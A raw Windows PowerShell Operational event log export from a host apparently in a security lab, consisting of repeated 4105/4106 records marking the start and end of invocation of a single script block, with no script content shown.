EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472653
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472652
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472651
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472650
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472649
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472648
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472647
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472646
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472645
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472644
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472643
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472642
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472641
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472640
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472639
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472638
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472637
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472636
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472635
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472634
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472633
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472632
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472631
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472630
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472629
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472628
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472627
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472626
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472625
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472624
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472623
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472622
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472621
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472620
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472619
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472618
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472617
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472616
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472615
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472614
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472613
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472612
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472611
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472610
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472609
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472608
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472607
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472606
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472605
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472604
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472603
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472602
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472601
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472600
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472599
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
